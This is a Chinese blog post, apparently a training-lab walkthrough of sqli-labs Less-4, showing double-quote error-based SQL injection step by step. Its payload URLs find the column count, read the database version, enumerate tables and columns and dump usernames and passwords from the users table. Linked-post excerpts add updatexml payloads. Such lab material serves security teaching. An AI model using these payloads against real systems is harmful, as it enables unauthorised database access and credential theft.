SQL注入双括号报错注入

最新推荐文章于 2024-10-23 09:16:57 发布
原创 最新推荐文章于 2024-10-23 09:16:57 发布 · 1.3k 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#SQL注入的类型

本文详细介绍了SQL注入中的双括号报错注入方法,从预备知识到实验步骤,包括如何判断列数、查看显错点、获取数据库信息、表名和列名,以及查看数据。通过实验步骤,揭示了SQL注入攻击的过程。

一、预备知识

1. SQL注入攻击指的是通过构建特殊的输入作为参数传入Web应用程序,而这些输入大都是SQL语法里的一些组合,通过执行SQL语句进而执行攻击者所要的操作,其主要原因是程序没有细致地过滤用户输入的数据,致使非法数据侵入系统。
2. 根据相关技术原理,SQL注入可以分为平台层注入和代码层注入。前者由不安全的数据库配置或数据库平台的漏洞所致;后者主要是由于程序员对输入未进行细致地过滤,从而执行了非法的数据查询。

二、实验目的

学会双引号报错注入的SQL注入。

三、实验工具

浏览器

四、实验步骤

第一步:访问

http://www.any.com/sqli/Less-4/?id=1 #页面正常

在这里插入图片描述

第二步:加入双引号,访问

http://www.any.com/sqli/Less-4/?id=1" #会报错

在这里插入图片描述

第三步:判断列数。(通过二分法)

1)输入:

http://www.any.com/sqli/Less-4/?id=1") order by 3 %23

页面正常,说明大于等于3列:

在这里插入图片描述

2)输入:

http://www.any.com/sqli/Less-4/?id=1") order by 4 %23

提示 Unknown column '4' in 'order clause',说明小于4列,结合上面的可以确定有3列:

在这里插入图片描述

第四步:查看显错点

http://www.any.com/sqli/Less-4/?id=1") and 1=2 union select 11,22,33 %23

显错点在第二个和第三个位置:

在这里插入图片描述

第五步:查看用户信息、数据库名称、MySQL版本信息

http://www.any.com/sqli/Less-4/?id=1") and 1=2 union select 11,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),33 %23

在这里插入图片描述

第六步:查看 security 数据库中所有表

http://www.any.com/sqli/Less-4/?id=1") and 1=2 union select 1,2,unhex(hex(group_concat(table_name))) from information_schema.tables where table_schema='security' %23

得到所有的表:emailsreferersuagentsusers

在这里插入图片描述

第七步:查看 users 表中所有列

http://www.any.com/sqli/Less-4/?id=1") and 1=2 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='security' %23

得到所有的列:idusernamepassword

在这里插入图片描述

第八步:查看所有列的值

http://www.any.com/sqli/Less-4/?id=1") and 1=2 union select 1,2,group_concat(id,' ',username,' ',password) from security.users %23

在这里插入图片描述

SQL注入报错注入
qq_68163788的博客
01-27 3520
QL注入是一种常见的安全漏洞,它允许攻击者通过在应用程序的输入中注入恶意的SQL代码来执行未经授权的数据库操作。报错注入是一种SQL注入类型,它利用数据库在执行恶意SQL语句时产生的错误消息来获取有关数据库结构和数据的信息。 假设有一个使用用户输入构建SQL查询的应用程序。攻击者可以通过在输入中注入恶意的SQL代码来触发数据库错误,并从错误消息中获取有关数据库的信息,如表名、列名等。这些信息可以帮助攻击者进一步利用数据库。
SQL注入系列篇 | 报错注入
d59hao的博客
05-05 1118
报错注入是通过构造恶意SQL,使数据库报错,从报错信息中得到敏感信息的方法。如果服务器应用没有对这种错误进行处理,则攻击者可以通过页面的错误回显获取数据。
SQL SERVER 引号问题处理
08-15
sql server 默认是用单引号标识字符串的,但有很多时候需要用引号,例如字符串里本来就包含单引号的时候。但往往设置不允许使用引号,该解决方案一条语句就搞定引号问题设置。
SQL注入引号报错注入
weixin_43765321的博客
03-02 2230
1. 基于联合查询引号注入模式 1.1 联合查询注入的一般步骤: 1.2 判断注入、求闭合字符 SQL语句如下时: 此时,若 id = 1‘ 无异常 id = 1 and 1 = 1 – +正确显示 id = 1 and 1 = 2 – +错误 则,极有可能存在数字型SQL注入 SQL语句如下时: 此时,若 id = 1‘ 无异常 id = 1’ and 1 = 1 – +正确显示 id = 1‘ and 1 = 2 – +错误 则,极有可能存在单引号字符型SQL注入 SQL语句如下时:
sql-libs(6) 引号的报错注入
weixin_30763455的博客
08-13 230
payload:http://192.168.48.130/sqli-laaess-6/?id=1" and updatexml(1,concat(0x7e,(SELECT schema_name from information_schema.schemata limit 8,1),0x7e),1)--+ 后面就不写了 ,麻烦 转载于:https://www.cnb...
SQL注入-4】
qq_41889600的博客
10-31 244
sql注入-4
SQL查询字段添加括号报错:Operand should contain 1 column(s)
热门推荐
samuBO的博客
10-21 2万+
select vid_id, vid_name, vid_leadrole, vid_desc, vid_director, vid_date, vid_area, vid_pic, vid_score, vid_info, vinfo.cid, vid_serialstate from tb_videoinfo vinfo where vinfo.cid in (select...
SQL注入之floor报错注入以及各个部分详细分析 + iwebsec 实例分析 + updatexml() 报错 + extractvalue() 报错
m0_50917178的博客
12-09 4337
文章目录前言一、什么是floor报错注入二、利用iwebsec模拟实际注入过程三、updatexml()和extractvalue()报错注入四、问题 前言 本文为作者的学习笔记,主要介绍了floor注入原理,利用注入代码(payload)分析每个部分的作用以此来解释floor注入的原理。在解释过程中会使用phpstudy搭建的MySQL环境,并且利用iwebsec漏洞库来实践。最后顺带介绍updatexml和extractvalue报错注入。 提示:以下是本篇文章正文内容,下面案例可供参考 一、什么是
SQL注入括号注入报错
studyphp123的博客
04-22 1233
一、预备知识 1. SQL注入基础知识 2. SQL语句基础知识 二、实验目的 学会SQL注入括号注入报错利用方式。 三、实验工具 Firefox浏览器 四、实验环境 1. 客户机一台 2. web服务器 五、实验步骤 第一步:访问 http://www.any.com/sqli/Less-3/?id=1 页面正常: 第二步:加入单引号,访问 http://www.any.com/s...
墨者学院-SQL注入漏洞测试(报错盲注)
weixin_42939822的博客
03-30 5368
墨者学院-SQL注入漏洞测试(报错盲注)
sql语句中单引号,引号的处理方法
12-15
下面我们就分别讲述,虽然说的是Insert语句, 但是Select、Update、Delete语句都是一样的。 假如有下述表格:          mytabe          字段1    username     字符串型(姓名)          字段2    age          数字型(年龄)          字段3    birthday      日期型(生日)          字段4    marry        布尔型(是否结婚,结婚为True,未结婚为False)          字段5    leixing       字符串型(类型)          1
怎么让sql查询的字段可以不出现在group分组里_白帽子:SQL注入查询注入
weixin_39792475的博客
11-28 558
什么是查询注入呢?看大佬的解释太深奥,粗俗的理解就是一个select语句里再嵌套一个select语句,将有用的信息显示在SQL报错信息。首先,理解四个函数/语句:Concat(),Rand(), Floor(), Count(),Group by clause①concat()函数我理解为组合,汇合函数将括号里的符号连接在一起。将结果连在了一起。②Rand函数用来返回一个01之间的随机数,区间...
注入括号报错注入_这可能是SQL注入入门最好的文章了(持续跟新四)
weixin_36298476的博客
01-12 384
sqli-labs Less-4本系列文章使用的靶场环境为sqli-labs环境下载地址:https://github.com/Audi-1/sqli-labs本系列文章持续跟新,一直到通过此靶场为止,如果对本文有疑问可以在下方给我留言,或者私信。希望大家可以点赞转发,支持一下作者1.判断注入类型index.php?id=1"单引号回显正常,引号会报错然后根据报错,我们可以得知这个sql注入页面...
【MySQL】:两表联查中简洁表达一个表的所有信息;SQL语句中的括号使用
随便写写
07-31 689
一、两表联查中简洁表达一个表的所有信息 select # bm.LOGIN_ID,bm.NAME,bm.TYPE,bm.XS,bm.HMD,bm.JL,bm.ADD1,bm.ADD2,bm.NSTATUS,bm.CREATE_TIME,bm.MEMBERQY_ID bm.* FROM biz_memberqy bm INNER JOIN biz_company bc on bm....
html sql注入_SQL注入特殊小技巧
weixin_39722188的博客
11-26 340
一位苦于信息安全的萌新小白帽本实验仅用于信息防御教学,切勿用于它用途公众号:XG小刚小技巧在平常的SQL注入过程中,难免会存在一些敏感函数被过滤,或者被WAF识别所拦截。所以我们可以通过其他不常用的函数来绕过过滤,实现相同的效果。在此只通过MYSQL数据库来表达意思,其他数据库自行百度谷歌。。。。。。逻辑运算符注入过程中,用到最最最频繁的就是逻辑符号,像and 1=1、or 2&...
sql server 字符串截取_web安全之SQL注入关联知识点
weixin_40001245的博客
12-03 124
Omiga 2019-11-24 15:29:58继续上一篇内容,在上一篇文章中以实例介绍了SQL注入的原理,本节主要介绍SQL注入中常用的方法函数及对注入点的判断,为后面盲注等内容做个铺垫,还是以mysql为例。mysql基础知识点基本运算符主要涉及到算数运算、比较运算、逻辑运算、位运算以及注释符,在上一篇的案例中其实也用到了该内容字符串处理用于对字符串处理,包括字符串连接、字符串比较、字符串截...
SQL注入教程——(三)简单的注入尝试
hijack89的博客
07-26 1万+
本文将以简单的SQL注入实例来讲解SQL注入的基本思路与流程,当然本文实例只是注入的一种情况,初学者应重点理解思路,学会举一反三。GET与POST进行SQL注入攻击,大家还需要了解两种基本的 HTTP 请求方法:GET 和 POST。在客户机和服务器之间进行请求-响应时,两种最常被用到的方法是:GET 和 POST。 GET - 从指定的资源请求数据。 POST - 向指定的资源提交要被处理的数据
2024版最新148款CTF工具整理大全(附下载安装包)含基础环境、Web 安全、加密解密、密码爆破、文件、隐写、逆向、PWN等全套工具
最新发布
Libra1313的博客
10-23 1万+
经常会有大学生粉丝朋友私信大白,想通过打CTF比赛镀金,作为进入一线互联网大厂的门票。但是在CTF做题很多的时候都会用到工具,所以在全网苦寻CTF比赛工具安装包!
【常见SQL报错及解决办法】个人记录,自用
z_2_0_的博客
11-14 1801
一些工作中遇到的SQL报错,个人记录自用
SQL注入攻防技术详解与实战源码解析
SQL注入是一种严重且广泛存在的网络安全漏洞,主要出现在Web应用程序与数据库交互的过程中。本文《SQL注入攻防详解[可运行源码]》深入剖析了SQL注入的原理、攻击方式、绕过技术以及防御策略,涵盖了从基础概念到高级...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值